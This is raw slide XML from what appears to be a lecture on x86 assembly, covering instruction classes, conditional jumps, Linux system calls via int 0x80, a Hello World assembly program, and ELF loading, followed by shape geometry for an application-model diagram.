                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (0x804a0e4),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 of memory at address 0x804a0e4 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142937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0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0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06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06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06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06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06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06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069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106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r>
              <a:rPr lang="en-US"/>
              <a:t>Instruction Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xchg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, push, pop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary arithmetic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add, sub, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>imul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>idiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, div, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>and, or, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, not</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43567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r>
              <a:rPr lang="en-US"/>
              <a:t>Instruction Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, call, ret, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>iret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Values can be compared using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> # subtracts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without saving the result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bits are set accordingly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (ZF=0), je (ZF=1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (CF=0), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (SF=OF), …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control transfer can be direct (destination is a constant) or indirect (the destination address is the content of a register)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input/output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in, out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Misc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83201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24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424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424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424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3424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34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Invoking System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System calls are usually invoked through libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux/x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contains the system call number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161620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Hello World!</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.data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	.string "Hello World\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	$4,%eax	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	$1,%ebx	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	$12,%edx	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		$0x80	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	$0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	ret	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5896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Loading and Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a program is invoked, the operating system creates a process to execute the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ELF file is parsed and parts are copied into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Linux /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;/maps shows the memory layout of a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relocation of objects and reference resolution is performed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The instruction pointer is set to the location specified as the start address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution begins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110768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bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="4486336"/>
            <a:ext cx="1447800" cy="1171515"/>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7" name="Oval 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4375653" y="2213710"/>
            <a:ext cx="2938675" cy="2099438"/>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 name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Oval 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4822187" y="2571498"/>
            <a:ext cx="2088558" cy="1527208"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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914400" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1794693" y="4486335"/>
            <a:ext cx="5562491" cy="1062748"/>
          </a:xfrm>
          <a:prstGeom prst="round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5" name="Can 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5346953" y="4628035"/>
            <a:ext cx="1039031" cy="858070"/>
          </a:xfrm>
          <a:prstGeom prst="can">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11" name="Oval 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2319456" y="2911895"/>
            <a:ext cx="1427357" cy="1062748"/>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12" name="Cloud 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="220401" y="4628035"/>
            <a:ext cx="1456001" cy="921048"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5426034" y="4302633"/>
            <a:ext cx="871145" cy="10493"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3022636" y="3462950"/>
            <a:ext cx="2466388" cy="1598057"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2466388"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2130743"/>
              <a:gd name="connsiteX1" fmla="*/ 10496 w 2466388"/>
              <a:gd name="connsiteY1" fmla="*/ 2130743 h 2130743"/>
              <a:gd name="connsiteX2" fmla="*/ 1889148 w 2466388"/>
              <a:gd name="connsiteY2" fmla="*/ 2120247 h 2130743"/>
              <a:gd name="connsiteX3" fmla="*/ 2466388 w 2466388"/>
              <a:gd name="connsiteY3" fmla="*/ 461836 h 2130743"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2466388" h="2130743">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3499" y="710248"/>
                  <a:pt x="10496" y="2130743"/>
                  <a:pt x="10496" y="2130743"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1889148" y="2120247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466388" y="461836"/>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4" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="734669" y="3872304"/>
            <a:ext cx="4932774" cy="1346147"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4932774"/>
              <a:gd name="connsiteY0" fmla="*/ 1794862 h 1794862"/>
              <a:gd name="connsiteX1" fmla="*/ 4355535 w 4932774"/>
              <a:gd name="connsiteY1" fmla="*/ 1784366 h 1794862"/>
              <a:gd name="connsiteX2" fmla="*/ 4932774 w 4932774"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1794862"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4932774" h="1794862">
                <a:moveTo>
                  <a:pt x="0" y="1794862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4355535" y="1784366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4932774" y="0"/>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5" name="Freeform 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6066263" y="3880177"/>
            <a:ext cx="1574290" cy="1172959"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1574290 w 1574290"/>
              <a:gd name="connsiteY0" fmla="*/ 1553448 h 1563945"/>
              <a:gd name="connsiteX1" fmla="*/ 713678 w 1574290"/>
